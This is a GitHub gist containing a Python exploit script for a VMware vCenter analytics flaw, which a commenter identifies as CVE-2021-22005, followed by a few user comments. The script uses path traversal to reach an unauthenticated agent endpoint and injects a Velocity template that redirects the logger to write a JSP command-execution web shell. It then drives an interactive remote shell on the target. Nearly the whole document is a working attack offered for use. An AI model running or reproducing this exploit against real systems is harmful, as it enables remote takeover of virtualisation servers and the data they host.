Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save testanull/5bb925179c4695e51ca400b7370bc252 to your computer and use it in GitHub Desktop.
Save testanull/5bb925179c4695e51ca400b7370bc252 to your computer and use it in GitHub Desktop.
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "&lt;")
_str = _str.replace(">", "&gt;")
_str = _str.replace("\"", "&quot;")
return _str
def run_shell(url, pwd, cmd):
burp0_url = url
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {pwd: cmd.strip()}
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
ct = ct.split('<pre>')[1].split('</pre>')[0]
return ct
def createAgent(url, agent_name):
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" }
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s")
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions()
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(false)
$GLOBAL-logger.info('<%%@ page import="java.util.*,java.io.*"%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%%if (request.getParameter("%s") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("%s")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%%></pre></BODY></HTML>')
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/var/log/vmware/analytics/analytics.log")
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions()
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(true)
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
$obj.addProperty("OSTYPE", "asdasda")##
$obj.addProperty("BUILD", $content-about-build)##
$obj.addProperty("VERSION", $content-about-version)##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)
target = sys.argv[1]
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print "Success!"
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
while True:
cmd = raw_input("/remote_shell/# ").strip()
if(cmd =="quit"):
sys.exit(-1)
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
time.sleep(1)
print(output)
@Grezzo
Copy link

Grezzo commented Sep 29, 2021

Nice job! What artefacts would be left behind after running this? Just an agent and the webshell? How can the agent be cleared up?

@MAYDA7
Copy link

MAYDA7 commented Sep 30, 2021

Is this a CVE?

@Grezzo
Copy link

Grezzo commented Sep 30, 2021

Is this a CVE?

CVE-2021-22005

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment